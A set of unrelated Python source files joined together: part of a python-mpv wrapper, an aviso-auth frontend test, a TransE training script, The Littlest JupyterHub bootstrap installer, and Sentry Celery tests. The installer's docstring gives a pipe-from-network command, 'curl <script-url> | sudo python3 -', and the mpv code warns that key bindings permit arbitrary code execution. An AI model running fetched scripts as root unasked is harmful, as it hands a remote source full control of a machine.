and extra keyword arguments will be passed to mpv as options. """ self._event_thread = None self.handle = _mpv_create() _mpv_set_option_string(self.handle, b'audio-display', b'no') istr = lambda o: ('yes' if o else 'no') if type(o) is bool else str(o) try: for flag in extra_mpv_flags: _mpv_set_option_string(self.handle, flag.encode('utf-8'), b'') for k,v in extra_mpv_opts.items(): _mpv_set_option_string(self.handle, k.replace('_', '-').encode('utf-8'), istr(v).encode('utf-8')) finally: _mpv_initialize(self.handle) self._event_callbacks = [] self._property_handlers = collections.defaultdict(lambda: []) self._message_handlers = {} self._key_binding_handlers = {} self._playback_cond = threading.Condition() self._event_handle = _mpv_create_client(self.handle, b'py_event_handler') self._loop = partial(_event_loop, self._event_handle, self._playback_cond, self._event_callbacks, self._message_handlers, self._property_handlers, log_handler) if start_event_thread: self._event_thread = threading.Thread(target=self._loop, name='MPVEventHandlerThread') self._event_thread.setDaemon(True) self._event_thread.start() else: self._event_thread = None if log_handler is not None: self.set_loglevel('terminal-default') def wait_for_playback(self): """ Waits until playback of the current title is paused or done """ with self._playback_cond: self._playback_cond.wait() def wait_for_property(self, name, cond=lambda val: val, level_sensitive=True): sema = threading.Semaphore(value=0) def observer(val): if cond(val): sema.release() self.observe_property(name, observer) if not level_sensitive or not cond(getattr(self, name.replace('-', '_'))): sema.acquire() self.unobserve_property(name, observer) def __del__(self): if self.handle: self.terminate() def terminate(self): self.handle, handle = None, self.handle if threading.current_thread() is self._event_thread: # Handle special case to allow event handle to be detached. # This is necessary since otherwise the event thread would deadlock itself. grim_reaper = threading.Thread(target=lambda: _mpv_terminate_destroy(handle)) grim_reaper.start() else: _mpv_terminate_destroy(handle) if self._event_thread: self._event_thread.join() def set_loglevel(self, level): _mpv_request_log_messages(self._event_handle, level.encode('utf-8')) def command(self, name, *args): """ Execute a raw command """ args = [name.encode('utf-8')] + [ (arg if type(arg) is bytes else str(arg).encode('utf-8')) for arg in args if arg is not None ] + [None] _mpv_command(self.handle, (c_char_p*len(args))(*args)) def seek(self, amount, reference="relative", precision="default-precise"): self.command('seek', amount, reference, precision) def revert_seek(self): self.command('revert_seek'); def frame_step(self): self.command('frame_step') def frame_back_step(self): self.command('frame_back_step') def _add_property(self, name, value=None): self.command('add_property', name, value) def _cycle_property(self, name, direction='up'): self.command('cycle_property', name, direction) def _multiply_property(self, name, factor): self.command('multiply_property', name, factor) def screenshot(self, includes='subtitles', mode='single'): self.command('screenshot', includes, mode) def screenshot_to_file(self, filename, includes='subtitles'): self.command('screenshot_to_file', filename.encode(fs_enc), includes) def playlist_next(self, mode='weak'): self.command('playlist_next', mode) def playlist_prev(self, mode='weak'): self.command('playlist_prev', mode) @staticmethod def _encode_options(options): return ','.join('{}={}'.format(str(key), str(val)) for key, val in options.items()) def loadfile(self, filename, mode='replace', **options): self.command('loadfile', filename.encode(fs_enc), mode, MPV._encode_options(options)) def loadlist(self, playlist, mode='replace'): self.command('loadlist', playlist.encode(fs_enc), mode) def playlist_clear(self): self.command('playlist_clear') def playlist_remove(self, index='current'): self.command('playlist_remove', index) def playlist_move(self, index1, index2): self.command('playlist_move', index1, index2) def run(self, command, *args): self.command('run', command, *args) def quit(self, code=None): self.command('quit', code) def quit_watch_later(self, code=None): self.command('quit_watch_later', code) def sub_add(self, filename): self.command('sub_add', filename.encode(fs_enc)) def sub_remove(self, sub_id=None): self.command('sub_remove', sub_id) def sub_reload(self, sub_id=None): self.command('sub_reload', sub_id) def sub_step(self, skip): self.command('sub_step', skip) def sub_seek(self, skip): self.command('sub_seek', skip) def toggle_osd(self): self.command('osd') def show_text(self, string, duration='-', level=None): self.command('show_text', string, duration, level) def show_progress(self): self.command('show_progress') def discnav(self, command): self.command('discnav', command) def write_watch_later_config(self): self.command('write_watch_later_config') def overlay_add(self, overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride): self.command('overlay_add', overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride) def overlay_remove(self, overlay_id): self.command('overlay_remove', overlay_id) def script_message(self, *args): self.command('script_message', *args) def script_message_to(self, target, *args): self.command('script_message_to', target, *args) def observe_property(self, name, handler): self._property_handlers[name].append(handler) _mpv_observe_property(self._event_handle, hash(name)&0xffffffffffffffff, name.encode('utf-8'), MpvFormat.STRING) def unobserve_property(self, name, handler): handlers = self._property_handlers[name] handlers.remove(handler) if not handlers: _mpv_unobserve_property(self._event_handle, hash(name)&0xffffffffffffffff) def register_message_handler(self, target, handler): self._message_handlers[target] = handler def unregister_message_handler(self, target): del self._message_handlers[target] def register_event_callback(self, callback): self._event_callbacks.append(callback) def unregister_event_callback(self, callback): self._event_callbacks.remove(callback) @staticmethod def _binding_name(callback_or_cmd): return 'py_kb_{:016x}'.format(hash(callback_or_cmd)&0xffffffffffffffff) def register_key_binding(self, keydef, callback_or_cmd, mode='force'): """ BIG FAT WARNING: mpv's key binding mechanism is pretty powerful. This means, you essentially get arbitrary code exectution through key bindings. This interface makes some limited effort to sanitize the keydef given in the first parameter, but YOU SHOULD NOT RELY ON THIS IN FOR SECURITY. If your input comes from config files, this is completely fine--but, if you are about to pass untrusted input into this parameter, better double-check whether this is secure in your case. """ if not re.match(r'(Shift+)?(Ctrl+)?(Alt+)?(Meta+)?(.|\w+)', keydef): raise ValueError('Invalid keydef. Expected format: [Shift+][Ctrl+][Alt+][Meta+]<key>\n' '<key> is either the literal character the key produces (ASCII or Unicode character), or a ' 'symbolic name (as printed by --input-keylist') binding_name = MPV._binding_name(keydef) if callable(callback_or_cmd): self._key_binding_handlers[binding_name] = callback_or_cmd self.register_message_handler('key-binding', self._handle_key_binding_message) self.command('define-section', binding_name, '{} script-binding py_event_handler/{}'.format(keydef, binding_name), mode) elif isinstance(callback_or_cmd, str): self.command('define-section', binding_name, '{} {}'.format(keydef, callback_or_cmd), mode) else: raise TypeError('register_key_binding expects either an str with an mpv command or a python callable.') self.command('enable-section', binding_name) def _handle_key_binding_message(self, binding_name, key_state, key_name): self._key_binding_handlers[binding_name](key_state, key_name) def unregister_key_binding(self, keydef): binding_name = MPV._binding_name(keydef) self.command('disable-section', binding_name) self.command('define-section', binding_name, '') if callable(callback): del self._key_binding_handlers[binding_name] if not self._key_binding_handlers: self.unregister_message_handler('key-binding') # Convenience functions def play(self, filename): self.loadfile(filename) # Property accessors def _get_property(self, name, proptype=str, decode_str=False): fmt = {int: MpvFormat.INT64, float: MpvFormat.DOUBLE, bool: MpvFormat.FLAG, str: MpvFormat.STRING, bytes: MpvFormat.STRING, commalist: MpvFormat.STRING, MpvFormat.NODE: MpvFormat.NODE}[proptype] out = cast(create_string_buffer(sizeof(c_void_p)), c_void_p) outptr = byref(out) try: cval = _mpv_get_property(self.handle, name.encode('utf-8'), fmt, outptr) rv = MpvNode.node_cast_value(outptr, fmt, decode_str or proptype in (str, commalist)) if proptype is commalist: rv = proptype(rv) if proptype is str: _mpv_free(out) elif proptype is MpvFormat.NODE: _mpv_free_node_contents(outptr) return rv except PropertyUnavailableError as ex: return None def _set_property(self, name, value, proptype=str): ename = name.encode('utf-8') if type(value) is bytes: _mpv_set_property_string(self.handle, ename, value) elif type(value) is bool: _mpv_set_property_string(self.handle, ename, b'yes' if value else b'no') elif proptype in (str, int, float): _mpv_set_property_string(self.handle, ename, str(proptype(value)).encode('utf-8')) else: raise TypeError('Cannot set {} property {} to value of type {}'.format(proptype, name, type(value))) # Dict-like option access def __getitem__(self, name, file_local=False): """ Get an option value """ prefix = 'file-local-options/' if file_local else 'options/' return self._get_property(prefix+name) def __setitem__(self, name, value, file_local=False): """ Get an option value """ prefix = 'file-local-options/' if file_local else 'options/' return self._set_property(prefix+name, value) def __iter__(self): return iter(self.options) def option_info(self, name): return self._get_property('option-info/'+name) def commalist(propval=''): return str(propval).split(',') node = MpvFormat.NODE ALL_PROPERTIES = { 'osd-level': (int, 'rw'), 'osd-scale': (float, 'rw'), 'loop': (str, 'rw'), 'loop-file': (str, 'rw'), 'speed': (float, 'rw'), 'filename': (bytes, 'r'), 'file-size': (int, 'r'), 'path': (bytes, 'r'), 'media-title': (bytes, 'r'), 'stream-pos': (int, 'rw'), 'stream-end': (int, 'r'), 'length': (float, 'r'), # deprecated for ages now 'duration': (float, 'r'), 'avsync': (float, 'r'), 'total-avsync-change': (float, 'r'), 'drop-frame-count': (int, 'r'), 'percent-pos': (float, 'rw'), # 'ratio-pos': (float, 'rw'), 'time-pos': (float, 'rw'), 'time-start': (float, 'r'), 'time-remaining': (float, 'r'), 'playtime-remaining': (float, 'r'), 'chapter': (int, 'rw'), 'edition': (int, 'rw'), 'disc-titles': (int, 'r'), 'disc-title': (str, 'rw'), # 'disc-menu-active': (bool, 'r'), 'chapters': (int, 'r'), 'editions': (int, 'r'), 'angle': (int, 'rw'), 'pause': (bool, 'rw'), 'core-idle': (bool, 'r'), 'cache': (int, 'r'), 'cache-size': (int, 'rw'), 'cache-free': (int, 'r'), 'cache-used': (int, 'r'), 'cache-speed': (int, 'r'), 'cache-idle': (bool, 'r'), 'cache-buffering-state': (int, 'r'), 'paused-for-cache': (bool, 'r'), # 'pause-for-cache': (bool, 'r'), 'eof-reached': (bool, 'r'), # 'pts-association-mode': (str, 'rw'), 'hr-seek': (str, 'rw'), 'volume': (float, 'rw'), 'volume-max': (int, 'rw'), 'ao-volume': (float, 'rw'), 'mute': (bool, 'rw'), 'ao-mute': (bool, 'rw'), 'audio-speed-correction': (float, 'r'), 'audio-delay': (float, 'rw'), 'audio-format': (str, 'r'), 'audio-codec': (str, 'r'), 'audio-codec-name': (str, 'r'), 'audio-bitrate': (float, 'r'), 'packet-audio-bitrate': (float, 'r'), 'audio-samplerate': (int, 'r'), 'audio-channels': (str, 'r'), 'aid': (str, 'rw'), 'audio': (str, 'rw'), # alias for aid 'balance': (int, 'rw'), 'fullscreen': (bool, 'rw'), 'deinterlace': (str, 'rw'), 'colormatrix': (str, 'rw'), 'colormatrix-input-range': (str, 'rw'), # 'colormatrix-output-range': (str, 'rw'), 'colormatrix-primaries': (str, 'rw'), 'ontop': (bool, 'rw'), 'border': (bool, 'rw'), 'framedrop': (str, 'rw'), 'gamma': (float, 'rw'), 'brightness': (int, 'rw'), 'contrast': (int, 'rw'), 'saturation': (int, 'rw'), 'hue': (int, 'rw'), 'hwdec': (str, 'rw'), 'panscan': (float, 'rw'), 'video-format': (str, 'r'), 'video-codec': (str, 'r'), 'video-bitrate': (float, 'r'), 'packet-video-bitrate': (float, 'r'), 'width': (int, 'r'), 'height': (int, 'r'), 'dwidth': (int, 'r'), 'dheight': (int, 'r'), 'fps': (float, 'r'), 'estimated-vf-fps': (float, 'r'), 'window-scale': (float, 'rw'), 'video-aspect': (str, 'rw'), 'osd-width': (int, 'r'), 'osd-height': (int, 'r'), 'osd-par': (float, 'r'), 'vid': (str, 'rw'), 'video': (str, 'rw'), # alias for vid 'video-align-x': (float, 'rw'), 'video-align-y': (float, 'rw'), 'video-pan-x': (float, 'rw'), 'video-pan-y': (float, 'rw'), 'video-zoom': (float, 'rw'), 'video-unscaled': (bool, 'w'), 'video-speed-correction': (float, 'r'), 'program': (int, 'w'), 'sid': (str, 'rw'), 'sub': (str, 'rw'), # alias for sid 'secondary-sid': (str, 'rw'), 'sub-delay': (float, 'rw'), 'sub-pos': (int, 'rw'), 'sub-visibility': (bool, 'rw'), 'sub-forced-only': (bool, 'rw'), 'sub-scale': (float, 'rw'), 'sub-bitrate': (float, 'r'), 'packet-sub-bitrate': (float, 'r'), # 'ass-use-margins': (bool, 'rw'), 'ass-vsfilter-aspect-compat': (bool, 'rw'), 'ass-style-override': (bool, 'rw'), 'stream-capture': (str, 'rw'), 'tv-brightness': (int, 'rw'), 'tv-contrast': (int, 'rw'), 'tv-saturation': (int, 'rw'), 'tv-hue': (int, 'rw'), 'playlist-pos': (int, 'rw'), 'playlist-pos-1': (int, 'rw'), # ugh. 'playlist-count': (int, 'r'), # 'quvi-format': (str, 'rw'), 'seekable': (bool, 'r'), 'seeking': (bool, 'r'), 'partially-seekable': (bool, 'r'), 'playback-abort': (bool, 'r'), 'cursor-autohide': (str, 'rw'), 'audio-device': (str, 'rw'), 'current-vo': (str, 'r'), 'current-ao': (str, 'r'), 'audio-out-detected-device': (str, 'r'), 'protocol-list': (str, 'r'), 'mpv-version': (str, 'r'), 'mpv-configuration': (str, 'r'), 'ffmpeg-version': (str, 'r'), 'display-sync-active': (bool, 'r'), 'stream-open-filename': (bytes, 'rw'), # Undocumented 'file-format': (commalist,'r'), # Be careful with this one. 'mistimed-frame-count': (int, 'r'), 'vsync-ratio': (float, 'r'), 'vo-drop-frame-count': (int, 'r'), 'vo-delayed-frame-count': (int, 'r'), 'playback-time': (float, 'rw'), 'demuxer-cache-duration': (float, 'r'), 'demuxer-cache-time': (float, 'r'), 'demuxer-cache-idle': (bool, 'r'), 'idle': (bool, 'r'), 'disc-title-list': (commalist,'r'), 'field-dominance': (str, 'rw'), 'taskbar-progress': (bool, 'rw'), 'on-all-workspaces': (bool, 'rw'), 'video-output-levels': (str, 'r'), 'vo-configured': (bool, 'r'), 'hwdec-current': (str, 'r'), 'hwdec-interop': (str, 'r'), 'estimated-frame-count': (int, 'r'), 'estimated-frame-number': (int, 'r'), 'sub-use-margins': (bool, 'rw'), 'ass-force-margins': (bool, 'rw'), 'video-rotate': (str, 'rw'), 'video-stereo-mode': (str, 'rw'), 'ab-loop-a': (str, 'r'), # What a mess... 'ab-loop-b': (str, 'r'), 'dvb-channel': (str, 'w'), 'dvb-channel-name': (str, 'rw'), 'window-minimized': (bool, 'r'), 'display-names': (commalist, 'r'), 'display-fps': (float, 'r'), # access apparently misdocumented in the manpage 'estimated-display-fps': (float, 'r'), 'vsync-jitter': (float, 'r'), 'video-params': (node, 'r', True), 'video-out-params': (node, 'r', True), 'track-list': (node, 'r', False), 'playlist': (node, 'r', False), 'chapter-list': (node, 'r', False), 'vo-performance': (node, 'r', True), 'filtered-metadata': (node, 'r', False), 'metadata': (node, 'r', False), 'chapter-metadata': (node, 'r', False), 'vf-metadata': (node, 'r', False), 'af-metadata': (node, 'r', False), 'edition-list': (node, 'r', False), 'disc-titles': (node, 'r', False), 'audio-params': (node, 'r', True), 'audio-out-params': (node, 'r', True), 'audio-device-list': (node, 'r', True), 'video-frame-info': (node, 'r', True), 'decoder-list': (node, 'r', True), 'encoder-list': (node, 'r', True), 'vf': (node, 'r', True), 'af': (node, 'r', True), 'options': (node, 'r', True), 'file-local-options': (node, 'r', True), 'property-list': (commalist,'r')} def bindproperty(MPV, name, proptype, access, decode_str=False): getter = lambda self: self._get_property(name, proptype, decode_str) setter = lambda self, value: self._set_property(name, value, proptype) def barf(*args): raise NotImplementedError('Access denied') setattr(MPV, name.replace('-', '_'), property(getter if 'r' in access else barf, setter if 'w' in access else barf)) for name, (proptype, access, *args) in ALL_PROPERTIES.items(): bindproperty(MPV, name, proptype, access, *args)
test_frontend_no_authoriser.py
# (C) Copyright 1996- ECMWF. # # This software is licensed under the terms of the Apache Licence Version 2.0 # which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. # In applying this licence, ECMWF does not waive the privileges and immunities # granted to it by virtue of its status as an intergovernmental organisation # nor does it submit to any jurisdiction. import os import threading import time import pytest import requests import yaml from aviso_auth import config, logger from aviso_auth.authorisation import Authoriser from aviso_auth.frontend import Frontend from flask import Flask from werkzeug.exceptions import InternalServerError def conf() -> config.Config: # this automatically configure the logging c = config.Config(conf_path=os.path.expanduser("~/.aviso-auth/testing/config.yaml")) c.authorisation_server["url"] = "http://127.0.0.1:8021" c.frontend["port"] = 8082 return c configuration = conf() frontend_url = ( f"http://{configuration.frontend['host']}:{configuration.frontend['port']}{configuration.backend['route']}" ) def valid_token() -> str: with open(os.path.expanduser("~/.aviso-auth/testing/credentials.yaml"), "r") as f: c = yaml.load(f.read(), Loader=yaml.Loader) return c["token"] def valid_email() -> str: with open(os.path.expanduser("~/.aviso-auth/testing/credentials.yaml"), "r") as f: c = yaml.load(f.read(), Loader=yaml.Loader) return c["email"] # mock authoriser mock_authoriser = Flask("Authoriser") @mock_authoriser.route("/", methods=["GET"]) def error(): return InternalServerError("Test Error") @pytest.fixture(scope="module", autouse=True) def prepost_module(): # Run the frontend at global level so it will be executed once and accessible to all tests frontend = Frontend(configuration) server = threading.Thread(target=frontend.run_server, daemon=True) server.start() time.sleep(1) # Run the mock authoriser authoriser = threading.Thread(target=mock_authoriser.run, daemon=True, kwargs={"host": "127.0.0.1", "port": 8021}) authoriser.start() time.sleep(1) yield def test_broken_authoriser(): logger.debug(os.environ.get("PYTEST_CURRENT_TEST").split(":")[-1].split(" ")[0]) key = "/ec/diss/SCL" # encode key encoded_key = Authoriser._encode_to_str_base64(key) range_end = Authoriser._encode_to_str_base64(str(Authoriser._incr_last_byte(key), "utf-8")) # create the body for the get range on the etcd sever body = { "key": encoded_key, "range_end": range_end, "limit": 100, "sort_order": "DESCEND", "sort_target": "KEY", "keys_only": False, "revision": None, "min_mod_revision": None, "max_mod_revision": None, } # make the call resp = requests.post( frontend_url, json=body, headers={"Authorization": f"EmailKey {valid_email()}:{valid_token()}"}, timeout=configuration.backend["req_timeout"], ) assert resp.status_code == 503
main_parallel.py
import pdb import torch from torch import optim, nn from torch.utils.data import Dataset, DataLoader from load import Mapping from model import TransE from prepare_data import TrainSet, TestSet import os import torch.multiprocessing as mp device = torch.device('cpu') train_batch_size = 32 test_batch_size = 256 num_epochs = 50 top_k = 10 train_dataset = TrainSet() test_dataset = TestSet() test_dataset.convert_word_to_index(train_dataset.entity_to_index, train_dataset.relation_to_index, test_dataset.raw_data) train_loader = DataLoader(train_dataset, batch_size=train_batch_size, shuffle=True) test_loader = DataLoader(test_dataset, batch_size=test_batch_size, shuffle=True) def train(model, epoch): total_loss = 0 for batch_idx, (pos, neg) in enumerate(train_loader): pos, neg = pos.to(device), neg.to(device) pos = torch.transpose(pos, 0, 1) neg = torch.transpose(neg, 0, 1) loss = model(*pos, *neg) total_loss += loss.item() model.optimize(loss) def main(): model = TransE(train_dataset.entity_num, train_dataset.relation_num, device) model.share_memory() for epoch in range(num_epochs): model.normalize() processes = [] num_processes = 8 for rank in range(num_processes): p = mp.Process(target=train, args=(model,epoch)) p.start() processes.append(p) for p in processes: p.join() corrct_test = 0 for batch_idx, data in enumerate(test_loader): data = data.to(device) data = torch.transpose(data, 0, 1) corrct_test += model.tail_predict(data[0], data[1], data[2], k=top_k) print(f"===>epoch {epoch+1}, test accuracy {corrct_test/test_dataset.__len__()}") if __name__ == "__main__": main()
bootstrap.py
""" Bootstrap an installation of TLJH. Sets up just enough TLJH environments to invoke tljh.installer. This script is run as: curl <script-url> | sudo python3 - Constraints: - Entire script should be compatible with Python 3.6 (We run on Ubuntu 18.04+) - Script should parse in Python 3.4 (since we exit with useful error message on Ubuntu 14.04+) - Use stdlib modules only """ import os from http.server import SimpleHTTPRequestHandler, HTTPServer import multiprocessing import subprocess import sys import logging import shutil import urllib.request html = """ <html> <head> <title>The Littlest Jupyterhub</title> </head> <body> <meta http-equiv="refresh" content="30" > <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width"> <img class="logo" src="https://raw.githubusercontent.com/jupyterhub/the-littlest-jupyterhub/master/docs/images/logo/logo.png"> <div class="loader center"></div> <div class="center main-msg">Please wait while your TLJH is building...</div> <div class="center logs-msg">Click the button below to see the logs</div> <div class="center tip" >Tip: to update the logs, refresh the page</div> <button class="logs-button center" onclick="window.location.href='/logs'">View logs</button> </body> <style> button:hover { background: grey; } .logo { width: 150px; height: auto; } .center { margin: 0 auto; margin-top: 50px; text-align:center; display: block; } .main-msg { font-size: 30px; font-weight: bold; color: grey; text-align:center; } .logs-msg { font-size: 15px; color: grey; } .tip { font-size: 13px; color: grey; margin-top: 10px; font-style: italic; } .logs-button { margin-top:15px; border: 0; color: white; padding: 15px 32px; font-size: 16px; cursor: pointer; background: #f5a252; } .loader { width: 150px; height: 150px; border-radius: 90%; border: 7px solid transparent; animation: spin 2s infinite ease; animation-direction: alternate; } @keyframes spin { 0% { transform: rotateZ(0deg); border-top-color: #f17c0e } 100% { transform: rotateZ(360deg); border-top-color: #fce5cf; } } </style> </head> </html> """ logger = logging.getLogger(__name__) def get_os_release_variable(key): """ Return value for key from /etc/os-release /etc/os-release is a bash file, so should use bash to parse it. Returns empty string if key is not found. """ return subprocess.check_output([ '/bin/bash', '-c', "source /etc/os-release && echo ${{{key}}}".format(key=key) ]).decode().strip() # Copied into tljh/utils.py. Make sure the copies are exactly the same! def run_subprocess(cmd, *args, **kwargs): """ Run given cmd with smart output behavior. If command succeeds, print output to debug logging. If it fails, print output to info logging. In TLJH, this sends successful output to the installer log, and failed output directly to the user's screen """ logger = logging.getLogger('tljh') proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, *args, **kwargs) printable_command = ' '.join(cmd) if proc.returncode != 0: # Our process failed! Show output to the user logger.error('Ran {command} with exit code {code}'.format( command=printable_command, code=proc.returncode )) logger.error(proc.stdout.decode()) raise subprocess.CalledProcessError(cmd=cmd, returncode=proc.returncode) else: # This goes into installer.log logger.debug('Ran {command} with exit code {code}'.format( command=printable_command, code=proc.returncode )) # This produces multi line log output, unfortunately. Not sure how to fix. # For now, prioritizing human readability over machine readability. logger.debug(proc.stdout.decode()) def validate_host(): """ Make sure TLJH is installable in current host """ # Support only Ubuntu 18.04+ distro = get_os_release_variable('ID') version = float(get_os_release_variable('VERSION_ID')) if distro != 'ubuntu': print('The Littlest JupyterHub currently supports Ubuntu Linux only') sys.exit(1) elif float(version) < 18.04: print('The Littlest JupyterHub requires Ubuntu 18.04 or higher') sys.exit(1) if sys.version_info < (3, 5): print("bootstrap.py must be run with at least Python 3.5") sys.exit(1) if not (shutil.which('systemd') and shutil.which('systemctl')): print("Systemd is required to run TLJH") # Only fail running inside docker if systemd isn't present if os.path.exists('/.dockerenv'): print("Running inside a docker container without systemd isn't supported") print("We recommend against running a production TLJH instance inside a docker container") print("For local development, see http://tljh.jupyter.org/en/latest/contributing/dev-setup.html") sys.exit(1) class LoaderPageRequestHandler(SimpleHTTPRequestHandler): def do_GET(self): if self.path == "/logs": with open("/opt/tljh/installer.log", "r") as log_file: logs = log_file.read() self.send_response(200) self.send_header('Content-Type', 'text/plain; charset=utf-8') self.end_headers() self.wfile.write(logs.encode('utf-8')) elif self.path == "/index.html": self.path = "/var/run/index.html" return SimpleHTTPRequestHandler.do_GET(self) elif self.path == "/favicon.ico": self.path = "/var/run/favicon.ico" return SimpleHTTPRequestHandler.do_GET(self) elif self.path == "/": self.send_response(302) self.send_header('Location','/index.html') self.end_headers() else: SimpleHTTPRequestHandler.send_error(self, code=403) def serve_forever(server): try: server.serve_forever() except KeyboardInterrupt: pass def main(): flags = sys.argv[1:] temp_page_flag = "--show-progress-page" # Check for flag in the argv list. This doesn't use argparse # because it's the only argument that's meant for the boostrap script. # All the other flags will be passed to and parsed by the installer. if temp_page_flag in flags: with open("/var/run/index.html", "w+") as f: f.write(html) favicon_url="https://raw.githubusercontent.com/jupyterhub/jupyterhub/master/share/jupyterhub/static/favicon.ico" urllib.request.urlretrieve(favicon_url, "/var/run/favicon.ico") # If the bootstrap is run to upgrade TLJH, then this will raise an "Address already in use" error try: loading_page_server = HTTPServer(("", 80), LoaderPageRequestHandler) p = multiprocessing.Process(target=serve_forever, args=(loading_page_server,)) # Serves the loading page until TLJH builds p.start() # Remove the flag from the args list, since it was only relevant to this script. flags.remove("--show-progress-page") # Pass the server's pid as a flag to the istaller pid_flag = "--progress-page-server-pid" flags.extend([pid_flag, str(p.pid)]) except OSError: # Only serve the loading page when installing TLJH pass validate_host() install_prefix = os.environ.get('TLJH_INSTALL_PREFIX', '/opt/tljh') hub_prefix = os.path.join(install_prefix, 'hub') # Set up logging to print to a file and to stderr os.makedirs(install_prefix, exist_ok=True) file_logger_path = os.path.join(install_prefix, 'installer.log') file_logger = logging.FileHandler(file_logger_path) # installer.log should be readable only by root os.chmod(file_logger_path, 0o500) file_logger.setFormatter(logging.Formatter('%(asctime)s %(message)s')) file_logger.setLevel(logging.DEBUG) logger.addHandler(file_logger) stderr_logger = logging.StreamHandler() stderr_logger.setFormatter(logging.Formatter('%(message)s')) stderr_logger.setLevel(logging.INFO) logger.addHandler(stderr_logger) logger.setLevel(logging.DEBUG) logger.info('Checking if TLJH is already installed...') if os.path.exists(os.path.join(hub_prefix, 'bin', 'python3')): logger.info('TLJH already installed, upgrading...') initial_setup = False else: logger.info('Setting up hub environment') initial_setup = True # Install software-properties-common, so we can get add-apt-repository # That helps us make sure the universe repository is enabled, since # that's where the python3-pip package lives. In some very minimal base # VM images, it looks like the universe repository is disabled by default, # causing bootstrapping to fail. run_subprocess(['apt-get', 'update', '--yes']) run_subprocess(['apt-get', 'install', '--yes', 'software-properties-common']) run_subprocess(['add-apt-repository', 'universe']) run_subprocess(['apt-get', 'update', '--yes']) run_subprocess(['apt-get', 'install', '--yes', 'python3', 'python3-venv', 'python3-pip', 'git' ]) logger.info('Installed python & virtual environment') os.makedirs(hub_prefix, exist_ok=True) run_subprocess(['python3', '-m', 'venv', hub_prefix]) logger.info('Set up hub virtual environment') if initial_setup: logger.info('Setting up TLJH installer...') else: logger.info('Upgrading TLJH installer...') pip_flags = ['--upgrade'] if os.environ.get('TLJH_BOOTSTRAP_DEV', 'no') == 'yes': pip_flags.append('--editable') tljh_repo_path = os.environ.get( 'TLJH_BOOTSTRAP_PIP_SPEC', 'git+https://github.com/underworld-geodynamics-cloud/the-littlest-jupyterhub.git' ) # Upgrade pip run_subprocess([ os.path.join(hub_prefix, 'bin', 'pip'), 'install', '--upgrade', 'pip==20.0.*' ]) logger.info('Upgraded pip') run_subprocess([ os.path.join(hub_prefix, 'bin', 'pip'), 'install' ] + pip_flags + [tljh_repo_path]) logger.info('Setup tljh package') logger.info('Starting TLJH installer...') os.execv( os.path.join(hub_prefix, 'bin', 'python3'), [ os.path.join(hub_prefix, 'bin', 'python3'), '-m', 'tljh.installer', ] + flags ) if __name__ == '__main__': main()
test_celery.py
import threading import pytest pytest.importorskip("celery") from sentry_sdk import Hub, configure_scope from sentry_sdk.integrations.celery import CeleryIntegration from sentry_sdk._compat import text_type from celery import Celery, VERSION from celery.bin import worker @pytest.fixture def connect_signal(request): def inner(signal, f): signal.connect(f) request.addfinalizer(lambda: signal.disconnect(f)) return inner @pytest.fixture def init_celery(sentry_init): def inner(propagate_traces=True, **kwargs): sentry_init( integrations=[CeleryIntegration(propagate_traces=propagate_traces)], **kwargs ) celery = Celery(__name__) if VERSION < (4,): celery.conf.CELERY_ALWAYS_EAGER = True else: celery.conf.task_always_eager = True return celery return inner @pytest.fixture def celery(init_celery): return init_celery() @pytest.fixture( params=[ lambda task, x, y: (task.delay(x, y), {"args": [x, y], "kwargs": {}}), lambda task, x, y: (task.apply_async((x, y)), {"args": [x, y], "kwargs": {}}), lambda task, x, y: ( task.apply_async(args=(x, y)), {"args": [x, y], "kwargs": {}}, ), lambda task, x, y: ( task.apply_async(kwargs=dict(x=x, y=y)), {"args": [], "kwargs": {"x": x, "y": y}}, ), ] ) def celery_invocation(request): """ Invokes a task in multiple ways Celery allows you to (testing our apply_async monkeypatch). Currently limited to a task signature of the form foo(x, y) """ return request.param def test_simple(capture_events, celery, celery_invocation): events = capture_events() @celery.task(name="dummy_task") def dummy_task(x, y): foo = 42 # noqa return x / y with Hub.current.start_span() as span: celery_invocation(dummy_task, 1, 2) _, expected_context = celery_invocation(dummy_task, 1, 0) event, = events assert event["contexts"]["trace"]["trace_id"] == span.trace_id assert event["contexts"]["trace"]["span_id"] != span.span_id assert event["transaction"] == "dummy_task" assert event["extra"]["celery-job"] == dict( task_name="dummy_task", **expected_context ) exception, = event["exception"]["values"] assert exception["type"] == "ZeroDivisionError" assert exception["mechanism"]["type"] == "celery" assert exception["stacktrace"]["frames"][0]["vars"]["foo"] == "42" @pytest.mark.parametrize("task_fails", [True, False], ids=["error", "success"]) def test_transaction_events(capture_events, init_celery, celery_invocation, task_fails): celery = init_celery(traces_sample_rate=1.0) @celery.task(name="dummy_task") def dummy_task(x, y): return x / y # XXX: For some reason the first call does not get instrumented properly. celery_invocation(dummy_task, 1, 1) events = capture_events() with Hub.current.start_span(transaction="submission") as span: celery_invocation(dummy_task, 1, 0 if task_fails else 1) if task_fails: error_event = events.pop(0) assert error_event["contexts"]["trace"]["trace_id"] == span.trace_id assert error_event["exception"]["values"][0]["type"] == "ZeroDivisionError" execution_event, submission_event = events assert execution_event["transaction"] == "dummy_task" assert submission_event["transaction"] == "submission" assert execution_event["type"] == submission_event["type"] == "transaction" assert execution_event["contexts"]["trace"]["trace_id"] == span.trace_id assert submission_event["contexts"]["trace"]["trace_id"] == span.trace_id if task_fails: assert execution_event["contexts"]["trace"]["status"] == "failure" else: assert "status" not in execution_event["contexts"]["trace"] assert execution_event["spans"] == [] assert submission_event["spans"] == [ { u"data": {}, u"description": u"dummy_task", u"op": "celery.submit", u"parent_span_id": submission_event["contexts"]["trace"]["span_id"], u"same_process_as_parent": True, u"span_id": submission_event["spans"][0]["span_id"], u"start_timestamp": submission_event["spans"][0]["start_timestamp"], u"tags": {}, u"timestamp": submission_event["spans"][0]["timestamp"], u"trace_id": text_type(span.trace_id), } ] def test_no_stackoverflows(celery): """We used to have a bug in the Celery integration where its monkeypatching was repeated for every task invocation, leading to stackoverflows. See https://github.com/getsentry/sentry-python/issues/265 """ results = [] @celery.task(name="dummy_task") def dummy_task(): with configure_scope() as scope: scope.set_tag("foo", "bar") results.append(42) for _ in range(10000): dummy_task.delay() assert results == [42] * 10000 with configure_scope() as scope: assert not scope._tags def test_simple_no_propagation(capture_events, init_celery): celery = init_celery(propagate_traces=False) events = capture_events() 